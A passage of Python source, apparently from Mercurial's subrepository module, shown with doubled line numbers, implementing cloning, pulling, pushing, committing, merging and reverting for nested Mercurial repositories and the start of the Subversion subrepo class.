637 @propertycache
638 def _relpath(self):
638 def _relpath(self):
639 """return path to this subrepository as seen from outermost repository
639 """return path to this subrepository as seen from outermost repository
640 """
640 """
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
641 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
642
642
643 class hgsubrepo(abstractsubrepo):
643 class hgsubrepo(abstractsubrepo):
644 def __init__(self, ctx, path, state, allowcreate):
644 def __init__(self, ctx, path, state, allowcreate):
645 super(hgsubrepo, self).__init__(ctx, path)
645 super(hgsubrepo, self).__init__(ctx, path)
646 self._state = state
646 self._state = state
647 r = ctx.repo()
647 r = ctx.repo()
648 root = r.wjoin(path)
648 root = r.wjoin(path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
649 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
650 self._repo = hg.repository(r.baseui, root, create=create)
650 self._repo = hg.repository(r.baseui, root, create=create)
651
651
652 # Propagate the parent's --hidden option
652 # Propagate the parent's --hidden option
653 if r is r.unfiltered():
653 if r is r.unfiltered():
654 self._repo = self._repo.unfiltered()
654 self._repo = self._repo.unfiltered()
655
655
656 self.ui = self._repo.ui
656 self.ui = self._repo.ui
657 for s, k in [('ui', 'commitsubrepos')]:
657 for s, k in [('ui', 'commitsubrepos')]:
658 v = r.ui.config(s, k)
658 v = r.ui.config(s, k)
659 if v:
659 if v:
660 self.ui.setconfig(s, k, v, 'subrepo')
660 self.ui.setconfig(s, k, v, 'subrepo')
661 # internal config: ui._usedassubrepo
661 # internal config: ui._usedassubrepo
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
662 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
663 self._initrepo(r, state[0], create)
663 self._initrepo(r, state[0], create)
664
664
665 @annotatesubrepoerror
665 @annotatesubrepoerror
666 def addwebdirpath(self, serverpath, webconf):
666 def addwebdirpath(self, serverpath, webconf):
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
667 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
668
668
669 def storeclean(self, path):
669 def storeclean(self, path):
670 with self._repo.lock():
670 with self._repo.lock():
671 return self._storeclean(path)
671 return self._storeclean(path)
672
672
673 def _storeclean(self, path):
673 def _storeclean(self, path):
674 clean = True
674 clean = True
675 itercache = self._calcstorehash(path)
675 itercache = self._calcstorehash(path)
676 for filehash in self._readstorehashcache(path):
676 for filehash in self._readstorehashcache(path):
677 if filehash != next(itercache, None):
677 if filehash != next(itercache, None):
678 clean = False
678 clean = False
679 break
679 break
680 if clean:
680 if clean:
681 # if not empty:
681 # if not empty:
682 # the cached and current pull states have a different size
682 # the cached and current pull states have a different size
683 clean = next(itercache, None) is None
683 clean = next(itercache, None) is None
684 return clean
684 return clean
685
685
686 def _calcstorehash(self, remotepath):
686 def _calcstorehash(self, remotepath):
687 '''calculate a unique "store hash"
687 '''calculate a unique "store hash"
688
688
689 This method is used to to detect when there are changes that may
689 This method is used to to detect when there are changes that may
690 require a push to a given remote path.'''
690 require a push to a given remote path.'''
691 # sort the files that will be hashed in increasing (likely) file size
691 # sort the files that will be hashed in increasing (likely) file size
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
692 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
693 yield '# %s\n' % _expandedabspath(remotepath)
693 yield '# %s\n' % _expandedabspath(remotepath)
694 vfs = self._repo.vfs
694 vfs = self._repo.vfs
695 for relname in filelist:
695 for relname in filelist:
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
696 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
697 yield '%s = %s\n' % (relname, filehash)
697 yield '%s = %s\n' % (relname, filehash)
698
698
699 @propertycache
699 @propertycache
700 def _cachestorehashvfs(self):
700 def _cachestorehashvfs(self):
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
701 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
702
702
703 def _readstorehashcache(self, remotepath):
703 def _readstorehashcache(self, remotepath):
704 '''read the store hash cache for a given remote repository'''
704 '''read the store hash cache for a given remote repository'''
705 cachefile = _getstorehashcachename(remotepath)
705 cachefile = _getstorehashcachename(remotepath)
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
707
707
708 def _cachestorehash(self, remotepath):
708 def _cachestorehash(self, remotepath):
709 '''cache the current store hash
709 '''cache the current store hash
710
710
711 Each remote repo requires its own store hash cache, because a subrepo
711 Each remote repo requires its own store hash cache, because a subrepo
712 store may be "clean" versus a given remote repo, but not versus another
712 store may be "clean" versus a given remote repo, but not versus another
713 '''
713 '''
714 cachefile = _getstorehashcachename(remotepath)
714 cachefile = _getstorehashcachename(remotepath)
715 with self._repo.lock():
715 with self._repo.lock():
716 storehash = list(self._calcstorehash(remotepath))
716 storehash = list(self._calcstorehash(remotepath))
717 vfs = self._cachestorehashvfs
717 vfs = self._cachestorehashvfs
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
719
719
720 def _getctx(self):
720 def _getctx(self):
721 '''fetch the context for this subrepo revision, possibly a workingctx
721 '''fetch the context for this subrepo revision, possibly a workingctx
722 '''
722 '''
723 if self._ctx.rev() is None:
723 if self._ctx.rev() is None:
724 return self._repo[None] # workingctx if parent is workingctx
724 return self._repo[None] # workingctx if parent is workingctx
725 else:
725 else:
726 rev = self._state[1]
726 rev = self._state[1]
727 return self._repo[rev]
727 return self._repo[rev]
728
728
729 @annotatesubrepoerror
729 @annotatesubrepoerror
730 def _initrepo(self, parentrepo, source, create):
730 def _initrepo(self, parentrepo, source, create):
731 self._repo._subparent = parentrepo
731 self._repo._subparent = parentrepo
732 self._repo._subsource = source
732 self._repo._subsource = source
733
733
734 if create:
734 if create:
735 lines = ['[paths]\n']
735 lines = ['[paths]\n']
736
736
737 def addpathconfig(key, value):
737 def addpathconfig(key, value):
738 if value:
738 if value:
739 lines.append('%s = %s\n' % (key, value))
739 lines.append('%s = %s\n' % (key, value))
740 self.ui.setconfig('paths', key, value, 'subrepo')
740 self.ui.setconfig('paths', key, value, 'subrepo')
741
741
742 defpath = _abssource(self._repo, abort=False)
742 defpath = _abssource(self._repo, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
744 addpathconfig('default', defpath)
744 addpathconfig('default', defpath)
745 if defpath != defpushpath:
745 if defpath != defpushpath:
746 addpathconfig('default-push', defpushpath)
746 addpathconfig('default-push', defpushpath)
747
747
748 fp = self._repo.vfs("hgrc", "w", text=True)
748 fp = self._repo.vfs("hgrc", "w", text=True)
749 try:
749 try:
750 fp.write(''.join(lines))
750 fp.write(''.join(lines))
751 finally:
751 finally:
752 fp.close()
752 fp.close()
753
753
754 @annotatesubrepoerror
754 @annotatesubrepoerror
755 def add(self, ui, match, prefix, explicitonly, **opts):
755 def add(self, ui, match, prefix, explicitonly, **opts):
756 return cmdutil.add(ui, self._repo, match,
756 return cmdutil.add(ui, self._repo, match,
757 self.wvfs.reljoin(prefix, self._path),
757 self.wvfs.reljoin(prefix, self._path),
758 explicitonly, **opts)
758 explicitonly, **opts)
759
759
760 @annotatesubrepoerror
760 @annotatesubrepoerror
761 def addremove(self, m, prefix, opts, dry_run, similarity):
761 def addremove(self, m, prefix, opts, dry_run, similarity):
762 # In the same way as sub directories are processed, once in a subrepo,
762 # In the same way as sub directories are processed, once in a subrepo,
763 # always entry any of its subrepos. Don't corrupt the options that will
763 # always entry any of its subrepos. Don't corrupt the options that will
764 # be used to process sibling subrepos however.
764 # be used to process sibling subrepos however.
765 opts = copy.copy(opts)
765 opts = copy.copy(opts)
766 opts['subrepos'] = True
766 opts['subrepos'] = True
767 return scmutil.addremove(self._repo, m,
767 return scmutil.addremove(self._repo, m,
768 self.wvfs.reljoin(prefix, self._path), opts,
768 self.wvfs.reljoin(prefix, self._path), opts,
769 dry_run, similarity)
769 dry_run, similarity)
770
770
771 @annotatesubrepoerror
771 @annotatesubrepoerror
772 def cat(self, match, fm, fntemplate, prefix, **opts):
772 def cat(self, match, fm, fntemplate, prefix, **opts):
773 rev = self._state[1]
773 rev = self._state[1]
774 ctx = self._repo[rev]
774 ctx = self._repo[rev]
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
776 prefix, **opts)
776 prefix, **opts)
777
777
778 @annotatesubrepoerror
778 @annotatesubrepoerror
779 def status(self, rev2, **opts):
779 def status(self, rev2, **opts):
780 try:
780 try:
781 rev1 = self._state[1]
781 rev1 = self._state[1]
782 ctx1 = self._repo[rev1]
782 ctx1 = self._repo[rev1]
783 ctx2 = self._repo[rev2]
783 ctx2 = self._repo[rev2]
784 return self._repo.status(ctx1, ctx2, **opts)
784 return self._repo.status(ctx1, ctx2, **opts)
785 except error.RepoLookupError as inst:
785 except error.RepoLookupError as inst:
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
787 % (inst, subrelpath(self)))
787 % (inst, subrelpath(self)))
788 return scmutil.status([], [], [], [], [], [], [])
788 return scmutil.status([], [], [], [], [], [], [])
789
789
790 @annotatesubrepoerror
790 @annotatesubrepoerror
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
792 try:
792 try:
793 node1 = node.bin(self._state[1])
793 node1 = node.bin(self._state[1])
794 # We currently expect node2 to come from substate and be
794 # We currently expect node2 to come from substate and be
795 # in hex format
795 # in hex format
796 if node2 is not None:
796 if node2 is not None:
797 node2 = node.bin(node2)
797 node2 = node.bin(node2)
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
799 node1, node2, match,
799 node1, node2, match,
800 prefix=posixpath.join(prefix, self._path),
800 prefix=posixpath.join(prefix, self._path),
801 listsubrepos=True, **opts)
801 listsubrepos=True, **opts)
802 except error.RepoLookupError as inst:
802 except error.RepoLookupError as inst:
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
804 % (inst, subrelpath(self)))
804 % (inst, subrelpath(self)))
805
805
806 @annotatesubrepoerror
806 @annotatesubrepoerror
807 def archive(self, archiver, prefix, match=None, decode=True):
807 def archive(self, archiver, prefix, match=None, decode=True):
808 self._get(self._state + ('hg',))
808 self._get(self._state + ('hg',))
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
810 rev = self._state[1]
810 rev = self._state[1]
811 ctx = self._repo[rev]
811 ctx = self._repo[rev]
812 for subpath in ctx.substate:
812 for subpath in ctx.substate:
813 s = subrepo(ctx, subpath, True)
813 s = subrepo(ctx, subpath, True)
814 submatch = matchmod.subdirmatcher(subpath, match)
814 submatch = matchmod.subdirmatcher(subpath, match)
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
816 decode)
816 decode)
817 return total
817 return total
818
818
819 @annotatesubrepoerror
819 @annotatesubrepoerror
820 def dirty(self, ignoreupdate=False, missing=False):
820 def dirty(self, ignoreupdate=False, missing=False):
821 r = self._state[1]
821 r = self._state[1]
822 if r == '' and not ignoreupdate: # no state recorded
822 if r == '' and not ignoreupdate: # no state recorded
823 return True
823 return True
824 w = self._repo[None]
824 w = self._repo[None]
825 if r != w.p1().hex() and not ignoreupdate:
825 if r != w.p1().hex() and not ignoreupdate:
826 # different version checked out
826 # different version checked out
827 return True
827 return True
828 return w.dirty(missing=missing) # working directory changed
828 return w.dirty(missing=missing) # working directory changed
829
829
830 def basestate(self):
830 def basestate(self):
831 return self._repo['.'].hex()
831 return self._repo['.'].hex()
832
832
833 def checknested(self, path):
833 def checknested(self, path):
834 return self._repo._checknested(self._repo.wjoin(path))
834 return self._repo._checknested(self._repo.wjoin(path))
835
835
836 @annotatesubrepoerror
836 @annotatesubrepoerror
837 def commit(self, text, user, date):
837 def commit(self, text, user, date):
838 # don't bother committing in the subrepo if it's only been
838 # don't bother committing in the subrepo if it's only been
839 # updated
839 # updated
840 if not self.dirty(True):
840 if not self.dirty(True):
841 return self._repo['.'].hex()
841 return self._repo['.'].hex()
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
843 n = self._repo.commit(text, user, date)
843 n = self._repo.commit(text, user, date)
844 if not n:
844 if not n:
845 return self._repo['.'].hex() # different version checked out
845 return self._repo['.'].hex() # different version checked out
846 return node.hex(n)
846 return node.hex(n)
847
847
848 @annotatesubrepoerror
848 @annotatesubrepoerror
849 def phase(self, state):
849 def phase(self, state):
850 return self._repo[state].phase()
850 return self._repo[state].phase()
851
851
852 @annotatesubrepoerror
852 @annotatesubrepoerror
853 def remove(self):
853 def remove(self):
854 # we can't fully delete the repository as it may contain
854 # we can't fully delete the repository as it may contain
855 # local-only history
855 # local-only history
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
857 hg.clean(self._repo, node.nullid, False)
857 hg.clean(self._repo, node.nullid, False)
858
858
859 def _get(self, state):
859 def _get(self, state):
860 source, revision, kind = state
860 source, revision, kind = state
861 if revision in self._repo.unfiltered():
861 if revision in self._repo.unfiltered():
862 return True
862 return True
863 self._repo._subsource = source
863 self._repo._subsource = source
864 srcurl = _abssource(self._repo)
864 srcurl = _abssource(self._repo)
865 other = hg.peer(self._repo, {}, srcurl)
865 other = hg.peer(self._repo, {}, srcurl)
866 if len(self._repo) == 0:
866 if len(self._repo) == 0:
867 self.ui.status(_('cloning subrepo %s from %s\n')
867 self.ui.status(_('cloning subrepo %s from %s\n')
868 % (subrelpath(self), srcurl))
868 % (subrelpath(self), srcurl))
869 parentrepo = self._repo._subparent
869 parentrepo = self._repo._subparent
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
871 self._repo.vfs.rmtree()
871 self._repo.vfs.rmtree()
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
873 other, self._repo.root,
873 other, self._repo.root,
874 update=False)
874 update=False)
875 self._repo = cloned.local()
875 self._repo = cloned.local()
876 self._initrepo(parentrepo, source, create=True)
876 self._initrepo(parentrepo, source, create=True)
877 self._cachestorehash(srcurl)
877 self._cachestorehash(srcurl)
878 else:
878 else:
879 self.ui.status(_('pulling subrepo %s from %s\n')
879 self.ui.status(_('pulling subrepo %s from %s\n')
880 % (subrelpath(self), srcurl))
880 % (subrelpath(self), srcurl))
881 cleansub = self.storeclean(srcurl)
881 cleansub = self.storeclean(srcurl)
882 exchange.pull(self._repo, other)
882 exchange.pull(self._repo, other)
883 if cleansub:
883 if cleansub:
884 # keep the repo clean after pull
884 # keep the repo clean after pull
885 self._cachestorehash(srcurl)
885 self._cachestorehash(srcurl)
886 return False
886 return False
887
887
888 @annotatesubrepoerror
888 @annotatesubrepoerror
889 def get(self, state, overwrite=False):
889 def get(self, state, overwrite=False):
890 inrepo = self._get(state)
890 inrepo = self._get(state)
891 source, revision, kind = state
891 source, revision, kind = state
892 repo = self._repo
892 repo = self._repo
893 repo.ui.debug("getting subrepo %s\n" % self._path)
893 repo.ui.debug("getting subrepo %s\n" % self._path)
894 if inrepo:
894 if inrepo:
895 urepo = repo.unfiltered()
895 urepo = repo.unfiltered()
896 ctx = urepo[revision]
896 ctx = urepo[revision]
897 if ctx.hidden():
897 if ctx.hidden():
898 urepo.ui.warn(
898 urepo.ui.warn(
899 _('revision %s in subrepository "%s" is hidden\n') \
899 _('revision %s in subrepository "%s" is hidden\n') \
900 % (revision[0:12], self._path))
900 % (revision[0:12], self._path))
901 repo = urepo
901 repo = urepo
902 hg.updaterepo(repo, revision, overwrite)
902 hg.updaterepo(repo, revision, overwrite)
903
903
904 @annotatesubrepoerror
904 @annotatesubrepoerror
905 def merge(self, state):
905 def merge(self, state):
906 self._get(state)
906 self._get(state)
907 cur = self._repo['.']
907 cur = self._repo['.']
908 dst = self._repo[state[1]]
908 dst = self._repo[state[1]]
909 anc = dst.ancestor(cur)
909 anc = dst.ancestor(cur)
910
910
911 def mergefunc():
911 def mergefunc():
912 if anc == cur and dst.branch() == cur.branch():
912 if anc == cur and dst.branch() == cur.branch():
913 self.ui.debug('updating subrepository "%s"\n'
913 self.ui.debug('updating subrepository "%s"\n'
914 % subrelpath(self))
914 % subrelpath(self))
915 hg.update(self._repo, state[1])
915 hg.update(self._repo, state[1])
916 elif anc == dst:
916 elif anc == dst:
917 self.ui.debug('skipping subrepository "%s"\n'
917 self.ui.debug('skipping subrepository "%s"\n'
918 % subrelpath(self))
918 % subrelpath(self))
919 else:
919 else:
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
921 hg.merge(self._repo, state[1], remind=False)
921 hg.merge(self._repo, state[1], remind=False)
922
922
923 wctx = self._repo[None]
923 wctx = self._repo[None]
924 if self.dirty():
924 if self.dirty():
925 if anc != dst:
925 if anc != dst:
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
927 mergefunc()
927 mergefunc()
928 else:
928 else:
929 mergefunc()
929 mergefunc()
930 else:
930 else:
931 mergefunc()
931 mergefunc()
932
932
933 @annotatesubrepoerror
933 @annotatesubrepoerror
934 def push(self, opts):
934 def push(self, opts):
935 force = opts.get('force')
935 force = opts.get('force')
936 newbranch = opts.get('new_branch')
936 newbranch = opts.get('new_branch')
937 ssh = opts.get('ssh')
937 ssh = opts.get('ssh')
938
938
939 # push subrepos depth-first for coherent ordering
939 # push subrepos depth-first for coherent ordering
940 c = self._repo['']
940 c = self._repo['']
941 subs = c.substate # only repos that are committed
941 subs = c.substate # only repos that are committed
942 for s in sorted(subs):
942 for s in sorted(subs):
943 if c.sub(s).push(opts) == 0:
943 if c.sub(s).push(opts) == 0:
944 return False
944 return False
945
945
946 dsturl = _abssource(self._repo, True)
946 dsturl = _abssource(self._repo, True)
947 if not force:
947 if not force:
948 if self.storeclean(dsturl):
948 if self.storeclean(dsturl):
949 self.ui.status(
949 self.ui.status(
950 _('no changes made to subrepo %s since last push to %s\n')
950 _('no changes made to subrepo %s since last push to %s\n')
951 % (subrelpath(self), dsturl))
951 % (subrelpath(self), dsturl))
952 return None
952 return None
953 self.ui.status(_('pushing subrepo %s to %s\n') %
953 self.ui.status(_('pushing subrepo %s to %s\n') %
954 (subrelpath(self), dsturl))
954 (subrelpath(self), dsturl))
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
957
957
958 # the repo is now clean
958 # the repo is now clean
959 self._cachestorehash(dsturl)
959 self._cachestorehash(dsturl)
960 return res.cgresult
960 return res.cgresult
961
961
962 @annotatesubrepoerror
962 @annotatesubrepoerror
963 def outgoing(self, ui, dest, opts):
963 def outgoing(self, ui, dest, opts):
964 if 'rev' in opts or 'branch' in opts:
964 if 'rev' in opts or 'branch' in opts:
965 opts = copy.copy(opts)
965 opts = copy.copy(opts)
966 opts.pop('rev', None)
966 opts.pop('rev', None)
967 opts.pop('branch', None)
967 opts.pop('branch', None)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
969
969
970 @annotatesubrepoerror
970 @annotatesubrepoerror
971 def incoming(self, ui, source, opts):
971 def incoming(self, ui, source, opts):
972 if 'rev' in opts or 'branch' in opts:
972 if 'rev' in opts or 'branch' in opts:
973 opts = copy.copy(opts)
973 opts = copy.copy(opts)
974 opts.pop('rev', None)
974 opts.pop('rev', None)
975 opts.pop('branch', None)
975 opts.pop('branch', None)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
977
977
978 @annotatesubrepoerror
978 @annotatesubrepoerror
979 def files(self):
979 def files(self):
980 rev = self._state[1]
980 rev = self._state[1]
981 ctx = self._repo[rev]
981 ctx = self._repo[rev]
982 return ctx.manifest().keys()
982 return ctx.manifest().keys()
983
983
984 def filedata(self, name, decode):
984 def filedata(self, name, decode):
985 rev = self._state[1]
985 rev = self._state[1]
986 data = self._repo[rev][name].data()
986 data = self._repo[rev][name].data()
987 if decode:
987 if decode:
988 data = self._repo.wwritedata(name, data)
988 data = self._repo.wwritedata(name, data)
989 return data
989 return data
990
990
991 def fileflags(self, name):
991 def fileflags(self, name):
992 rev = self._state[1]
992 rev = self._state[1]
993 ctx = self._repo[rev]
993 ctx = self._repo[rev]
994 return ctx.flags(name)
994 return ctx.flags(name)
995
995
996 @annotatesubrepoerror
996 @annotatesubrepoerror
997 def printfiles(self, ui, m, fm, fmt, subrepos):
997 def printfiles(self, ui, m, fm, fmt, subrepos):
998 # If the parent context is a workingctx, use the workingctx here for
998 # If the parent context is a workingctx, use the workingctx here for
999 # consistency.
999 # consistency.
1000 if self._ctx.rev() is None:
1000 if self._ctx.rev() is None:
1001 ctx = self._repo[None]
1001 ctx = self._repo[None]
1002 else:
1002 else:
1003 rev = self._state[1]
1003 rev = self._state[1]
1004 ctx = self._repo[rev]
1004 ctx = self._repo[rev]
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1006
1006
1007 @annotatesubrepoerror
1007 @annotatesubrepoerror
1008 def getfileset(self, expr):
1008 def getfileset(self, expr):
1009 if self._ctx.rev() is None:
1009 if self._ctx.rev() is None:
1010 ctx = self._repo[None]
1010 ctx = self._repo[None]
1011 else:
1011 else:
1012 rev = self._state[1]
1012 rev = self._state[1]
1013 ctx = self._repo[rev]
1013 ctx = self._repo[rev]
1014
1014
1015 files = ctx.getfileset(expr)
1015 files = ctx.getfileset(expr)
1016
1016
1017 for subpath in ctx.substate:
1017 for subpath in ctx.substate:
1018 sub = ctx.sub(subpath)
1018 sub = ctx.sub(subpath)
1019
1019
1020 try:
1020 try:
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1022 except error.LookupError:
1022 except error.LookupError:
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1025 return files
1025 return files
1026
1026
1027 def walk(self, match):
1027 def walk(self, match):
1028 ctx = self._repo[None]
1028 ctx = self._repo[None]
1029 return ctx.walk(match)
1029 return ctx.walk(match)
1030
1030
1031 @annotatesubrepoerror
1031 @annotatesubrepoerror
1032 def forget(self, match, prefix):
1032 def forget(self, match, prefix):
1033 return cmdutil.forget(self.ui, self._repo, match,
1033 return cmdutil.forget(self.ui, self._repo, match,
1034 self.wvfs.reljoin(prefix, self._path), True)
1034 self.wvfs.reljoin(prefix, self._path), True)
1035
1035
1036 @annotatesubrepoerror
1036 @annotatesubrepoerror
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1039 self.wvfs.reljoin(prefix, self._path),
1039 self.wvfs.reljoin(prefix, self._path),
1040 after, force, subrepos)
1040 after, force, subrepos)
1041
1041
1042 @annotatesubrepoerror
1042 @annotatesubrepoerror
1043 def revert(self, substate, *pats, **opts):
1043 def revert(self, substate, *pats, **opts):
1044 # reverting a subrepo is a 2 step process:
1044 # reverting a subrepo is a 2 step process:
1045 # 1. if the no_backup is not set, revert all modified
1045 # 1. if the no_backup is not set, revert all modified
1046 # files inside the subrepo
1046 # files inside the subrepo
1047 # 2. update the subrepo to the revision specified in
1047 # 2. update the subrepo to the revision specified in
1048 # the corresponding substate dictionary
1048 # the corresponding substate dictionary
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1050 if not opts.get('no_backup'):
1050 if not opts.get('no_backup'):
1051 # Revert all files on the subrepo, creating backups
1051 # Revert all files on the subrepo, creating backups
1052 # Note that this will not recursively revert subrepos
1052 # Note that this will not recursively revert subrepos
1053 # We could do it if there was a set:subrepos() predicate
1053 # We could do it if there was a set:subrepos() predicate
1054 opts = opts.copy()
1054 opts = opts.copy()
1055 opts['date'] = None
1055 opts['date'] = None
1056 opts['rev'] = substate[1]
1056 opts['rev'] = substate[1]
1057
1057
1058 self.filerevert(*pats, **opts)
1058 self.filerevert(*pats, **opts)
1059
1059
1060 # Update the repo to the revision specified in the given substate
1060 # Update the repo to the revision specified in the given substate
1061 if not opts.get('dry_run'):
1061 if not opts.get('dry_run'):
1062 self.get(substate, overwrite=True)
1062 self.get(substate, overwrite=True)
1063
1063
1064 def filerevert(self, *pats, **opts):
1064 def filerevert(self, *pats, **opts):
1065 ctx = self._repo[opts['rev']]
1065 ctx = self._repo[opts['rev']]
1066 parents = self._repo.dirstate.parents()
1066 parents = self._repo.dirstate.parents()
1067 if opts.get('all'):
1067 if opts.get('all'):
1068 pats = ['set:modified()']
1068 pats = ['set:modified()']
1069 else:
1069 else:
1070 pats = []
1070 pats = []
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1072
1072
1073 def shortid(self, revid):
1073 def shortid(self, revid):
1074 return revid[:12]
1074 return revid[:12]
1075
1075
1076 def verify(self):
1076 def verify(self):
1077 try:
1077 try:
1078 rev = self._state[1]
1078 rev = self._state[1]
1079 ctx = self._repo.unfiltered()[rev]
1079 ctx = self._repo.unfiltered()[rev]
1080 if ctx.hidden():
1080 if ctx.hidden():
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1082 # explicit warning.
1082 # explicit warning.
1083 ui = self._repo.ui
1083 ui = self._repo.ui
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1085 (self._relpath, node.short(self._ctx.node())))
1085 (self._relpath, node.short(self._ctx.node())))
1086 return 0
1086 return 0
1087 except error.RepoLookupError:
1087 except error.RepoLookupError:
1088 # A missing subrepo revision may be a case of needing to pull it, so
1088 # A missing subrepo revision may be a case of needing to pull it, so
1089 # don't treat this as an error.
1089 # don't treat this as an error.
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1091 (self._relpath, node.short(self._ctx.node())))
1091 (self._relpath, node.short(self._ctx.node())))
1092 return 0
1092 return 0
1093
1093
1094 @propertycache
1094 @propertycache
1095 def wvfs(self):
1095 def wvfs(self):
1096 """return own wvfs for efficiency and consistency
1096 """return own wvfs for efficiency and consistency
1097 """
1097 """
1098 return self._repo.wvfs
1098 return self._repo.wvfs
1099
1099
1100 @propertycache
1100 @propertycache
1101 def _relpath(self):
1101 def _relpath(self):
1102 """return path to this subrepository as seen from outermost repository
1102 """return path to this subrepository as seen from outermost repository
1103 """
1103 """
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1105 return reporelpath(self._repo)
1105 return reporelpath(self._repo)
1106
1106
1107 class svnsubrepo(abstractsubrepo):
1107 class svnsubrepo(abstractsubrepo):
1108 def __init__(self, ctx, path, state, allowcreate):
1108 def __init__(self, ctx, path, state, allowcreate):
1109 super(svnsubrepo, self).__init__(ctx, path)
1109 super(svnsubrepo, self).__init__(ctx, path)
1110 self._state = state
1110 self._state = state
1111 self._exe = util.findexe('svn')
1111 self._exe = util.findexe('svn')
1112 if not self._exe:
1112 if not self._exe:
1113 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1113 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1114 % self._path)
1114 % self._path)
1115
1115
1116 def _svncommand(self, commands, filename='', failok=False):
1116 def _svncommand(self, commands, filename='', failok=False):
1117 cmd = [self._exe]
1117 cmd = [self._exe]
1118 extrakw = {}
1118 extrakw = {}
1119 if not self.ui.interactive():
1119 if not self.ui.interactive():
1120 # Making stdin be a pipe should prevent svn from behaving
1120 # Making stdin be a pipe should prevent svn from behaving
1121 # interactively even if we can't pass --non-interactive.
1121 # interactively even if we can't pass --non-interactive.
1122 extrakw['stdin'] = subprocess.PIPE
1122 extrakw['stdin'] = subprocess.PIPE
1123 # Starting in svn 1.5 --non-interactive is a global flag
1123 # Starting in svn 1.5 --non-interactive is a global flag
1124 # instead of being per-command, but we need to support 1.4 so
1124 # instead of being per-command, but we need to support 1.4 so
1125 # we have to be intelligent about what commands take
1125 # we have to be intelligent about what commands take
1126 # --non-interactive.
1126 # --non-interactive.
1127 if commands[0] in ('update', 'checkout', 'commit'):
1127 if commands[0] in ('update', 'checkout', 'commit'):
1128 cmd.append('--non-interactive')
1128 cmd.append('--non-interactive')
1129 cmd.extend(commands)
1129 cmd.extend(commands)
1130 if filename is not None:
